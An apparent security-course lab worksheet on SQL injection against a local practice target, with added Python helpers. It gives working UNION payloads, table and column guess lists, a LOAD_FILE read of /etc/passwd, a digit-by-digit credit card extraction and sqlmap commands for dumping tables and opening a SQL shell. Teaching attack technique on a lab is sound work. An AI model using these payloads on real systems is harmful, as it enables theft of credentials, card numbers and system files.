SQL Injection Testing/Attacks (Lab 9)
Last Update Unknown
A space is required after the "--" comment marker that closes an injection (MySQL ignores "--" unless whitespace follows it). In a URL encode it as %20; a literal space also works where the browser keeps it.
Question 2: Db Testing - SQL Injection Methodology
In a browser window, navigate to:
A %20 is needed at the end, because MySQL requires a space character after the comment marker.
Find out the name of the table being queried using fuzzing.
Take the SQL injection you previously used to work out the number of columns and add "from TABLENAME" to the end, where TABLENAME has to be guessed. As this is all about stock and inventory, try one of the following table name candidates:
stock
stocklist
stockinfo
items
inventory
stockinventory
iteminventory
investorylist
Find out the name of one of the columns in this table using fuzzing.
Take the SQL injection you previously used to work out the number of columns and replace one of the NULL entries with a guess at the name of the item-code column. Try the following candidates:
code
item
id
barcode
itemid
codeid
barid
idcode
Find out the name of another missing column in this table using fuzzing.
Take your previous SQL injection and replace one of the other NULL entries with a guess at the name of the stock-level column. As this is about stock, it seems plausible that the missing column records how much stock is available. Try the following candidates:
stockno
stocknumber
itemsinstock
instock
totalstock
totalitems
total
available
itemsavailable
Recall your first injection, where you discovered all the items in the database and their codes. Use that to find the row for milk in this injection. How much milk is in stock?
In your SELECT injection go back to the example with all columns NULL. Explore the metadata of the database using this UNION SELECT hack, making use of the first NULL to run some additional functions.
Use the first attribute to find out the username of the database user being hacked. This is in the form "thename@machinename" and comes from a MySQL function.
Use the first attribute to find out the version of the MySQL database being hacked. This comes from a MySQL variable. The output will have numbers, dots, minus signs, and potentially extra information after a plus character.
Use the first attribute to find out the name of the database (i.e. the schema name) which we are using. This comes from a MySQL function.
With the database name and your SQL injection, change the first NULL column to select "table_name" from "information_schema.tables", restricting the query to rows whose "table_schema" is the database name identified above.
Using "information_schema.columns", what are the column names (the "column_name" column) of the table you suspect is the user-information table in this database schema? Restrict the injected query to the correct table_schema and table_name. Enter the column names in alphabetical order.
Now extend your original SQL injection, using the name of the application user's table and the newly discovered column names to access the application's user table information, showing the usernames and passwords.
What is the password for user "clever"?
Again extending your original SQL injection, use the LOAD_FILE function to read /etc/passwd (LOAD_FILE only works when the database user has the FILE privilege and the file is readable by the MySQL server). Each line of the password file has the format:
username:x:userid:groupid:gecos:/home:/bin/bash
Using this information, what is the first username seen in /etc/passwd using this injection?
The output of the above is a little messy to read. Use CONCAT to wrap the output of LOAD_FILE between the HTML strings "<pre>" and "</pre>", then repeat your experiment with this new formatting.
Using this information, what is the userid for the username ntp? In /etc/passwd, fields are separated by ':', and the userid is field 3.
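Building the CONCAT/LOAD_FILE request and then parsing what comes back, as an added example rather than the lab's code. The injection point is the stock.pl URL the lab uses later for sqlmap, the column count is a parameter because it was found by fuzzing, and SAMPLE_PAGE is a constructed response (not the lab machine's real /etc/passwd) with the "<pre>" wrapper in place.

```python
"""Reading /etc/passwd through LOAD_FILE and pulling fields out of it.

Added example, not the lab's own code. SAMPLE_PAGE is constructed for the
demonstration; the uids and shells in it are not the lab machine's.
"""
from urllib.parse import quote

INJECTION_POINT = "http://127.0.0.1/cgi-bin/stock.pl?code="

SAMPLE_PAGE = """<html><body><table><tr><td>
<pre>root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
ntp:x:105:111::/home/ntp:/bin/false
mysql:x:106:113:MySQL Server,,,:/nonexistent:/bin/false
</pre></td></tr></table></body></html>"""


def load_file_payload(path, ncols, base=INJECTION_POINT):
    """Build the GET URL: the first column carries CONCAT('<pre>',
    LOAD_FILE(path),'</pre>'), the rest stay NULL. quote() percent-encodes
    the quotes, the slashes and, importantly, the space after '--' (%20)."""
    first = f"CONCAT('<pre>',LOAD_FILE('{path}'),'</pre>')"
    sel = ",".join([first] + ["NULL"] * (ncols - 1))
    return base + quote(f"' UNION SELECT {sel} -- ", safe="")


def extract_pre(html):
    """Return the text between the <pre> markers we injected, or '' when the
    file could not be read: LOAD_FILE returns NULL, CONCAT of NULL is NULL,
    so the markers never appear in the page."""
    start = html.find("<pre>")
    end = html.find("</pre>", start)
    if start < 0 or end < 0:
        return ""
    return html[start + len("<pre>"):end]


def parse_passwd(text):
    """Map username -> (uid, gid, gecos, home, shell). Lines without the
    seven colon-separated fields are skipped rather than trusted."""
    entries = {}
    for line in text.splitlines():
        fields = line.strip().split(":")
        if len(fields) != 7:
            continue
        name, _pw, uid, gid, gecos, home, shell = fields
        entries[name] = (int(uid), int(gid), gecos, home, shell)
    return entries


def first_username(html):
    """First username in the dumped file (field 1 of the first line)."""
    for line in extract_pre(html).splitlines():
        if ":" in line:
            return line.split(":", 1)[0]
    return None


def uid_of(html, username):
    """Field 3 of the matching line, or None if the user is absent."""
    entry = parse_passwd(extract_pre(html)).get(username)
    return entry[0] if entry else None


if __name__ == "__main__":
    print(load_file_payload("/etc/passwd", 3))
    print(first_username(SAMPLE_PAGE), uid_of(SAMPLE_PAGE, "ntp"))
```

Fetch load_file_payload("/etc/passwd", n) with the browser or curl and feed the response body to uid_of; the parser ignores the rest of the page because it only reads between the markers it injected.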
Question 3: More SQLi Fun
Consider the script /cgi-bin/card.pl
Although the form technically uses the POST method, the script accepts the same parameters via GET too, which makes life a lot nicer for us!
Look at the html source for the form. What is the name of the text box?
Try looking at "tony", using a GET request. His credit card details are obscured...
Inject SQL to negate the test restricting the query to "tony", so that all users' details are returned.
How many credit cards are stored in the database?
How many columns are used in the SQL query related to this injection attack in card.pl?
Number of columns that it confirms in the SQL query:
Which of the columns is the one related to the credit card number? Inject the card "9999-9999-9999-9999" into each column and see which appears in the output.
Column number of the card column (numbered from 1).
On the basis that the credit card information is held in a table called "ccards", with the username in "uname" and the credit card number in "code", use SUBSTRING and CONCAT to access characters 1-4 of the credit card number associated with "tony".
BE WARNED: the credit card number must be formatted as groups of 4 digits separated by hyphens, or the script will block the display.
Digits 1-4 of tony's card
Continue that technique and build tony's complete credit card number.
Tony's complete card in the form XXXX-XXXX-XXXX-XXXX.
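The Question 3 steps (negating the uname test, locating the card column with the 9999 probe, then pulling the card out four digits at a time) as an added example, not the lab's own code. card.pl is simulated with in-memory SQLite and a constructed card number. The simulation assumes the script masks the stored number inside its own query except for the last group, that a UNION'd value bypasses that masking, and that the page only prints a card value matching the XXXX-XXXX-XXXX-XXXX shape (the lab's warning); SQLite's substr() and || stand in for MySQL's SUBSTRING() and CONCAT().

```python
"""Reading tony's card number out of card.pl four digits at a time.

Added example, not the lab's own code. card.pl is simulated; its masking
and format-check behaviour below are assumptions, and the card numbers are
constructed.
"""
import re
import sqlite3

_db = sqlite3.connect(":memory:")
_db.execute("CREATE TABLE ccards(uname TEXT, code TEXT)")
_db.execute("INSERT INTO ccards VALUES ('tony', '1234-5678-9012-3456'), "
            "('bob', '2222-3333-4444-5555')")

CARD_FORMAT = re.compile(r"^[0-9*]{4}(-[0-9*]{4}){3}$")
PROBE = "9999-9999-9999-9999"


def card_pl(name):
    """Vulnerable lookup: 'name' comes straight from the text box (GET works
    too). Masking happens inside the query, so injected UNION rows are not
    masked; the display check then blanks anything not in card format."""
    sql = ("SELECT uname, '****-****-****-' || substr(code, -4) FROM ccards "
           f"WHERE uname = '{name}'")
    try:
        rows = _db.execute(sql).fetchall()
    except sqlite3.Error:
        return None
    return [(u, c if c and CARD_FORMAT.match(c) else "") for u, c in rows]


def all_users():
    """Negate the uname restriction so every row comes back."""
    return [u for u, _ in card_pl("' OR '1'='1")]


def find_card_column(ncols):
    """Put the PROBE card in each column in turn; the one that shows up in
    the output is the card column (numbered from 1)."""
    for pos in range(ncols):
        sel = ["NULL"] * ncols
        sel[pos] = f"'{PROBE}'"
        rows = card_pl(f"' UNION SELECT {','.join(sel)} -- ")
        if rows and any(c == PROBE for _, c in rows):
            return pos + 1
    return None


def extract_card(victim):
    """Fetch the four digit groups at offsets 1, 6, 11 and 16, each padded
    to a full well-formed card so the display check lets it through.
    MySQL form: CONCAT(SUBSTRING(code,<start>,4),'-9999-9999-9999')."""
    groups = []
    for start in (1, 6, 11, 16):
        expr = f"substr(code, {start}, 4) || '-9999-9999-9999'"
        rows = card_pl(f"' UNION SELECT 'probe', {expr} FROM ccards "
                       f"WHERE uname = '{victim}' -- ")
        shown = next(c for u, c in rows if u == "probe")
        groups.append(shown[:4])
    return "-".join(groups)


if __name__ == "__main__":
    print(card_pl("tony"), all_users(), find_card_column(2), extract_card("tony"))
```

The padding is the whole trick: a bare SUBSTRING result is four characters and fails the format check, so each request ships a complete-looking card in which only one group is real.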
Question 4: SQLi Tools: sqlmap
Now that you have seen the weaknesses in the two target scripts and exploited them manually, experience the power of the automated tools!
Use sqlmap from a Kali Linux terminal window to fingerprint the target app and db. Use the same injection point:
http://127.0.0.1/cgi-bin/stock.pl?code=
Run sqlmap on the URL, and enumerate all of the Db's, and the current User and Db
sqlmap -u http://127.0.0.1/cgi-bin/stock.pl?code= -f -b -v 2 --dbs --current-user --current-db
What does sqlmap say is the number of databases?
Enumerate Db Tables and Columns
Now keep the same injection point, but this time use only "--tables" and "--columns", restricted to the "hack" database with "-D hack". Use this information to discover the maximum VARCHAR length of "uname" in the "ccards" table.
Retrieve Data From Db Table
Keeping the same injection point and database, this time let's query some user data. Try to "dump" the ccards table data using sqlmap. Use the man page to discover how to "dump" and how to select a specific "T"able; you still need "-D hack". Use this information to view the whole of the ccards table data.
When does Tony's card expire? Use the format 12/99 expiry
SQLMap SQL Shell
Again using sqlmap, with the same injection point and database, use the "--sql-shell" flag to open a SQL interface to the database via the injection point.
Use that to run the SQL command:
select * from theusers;
Who has the password "magic"?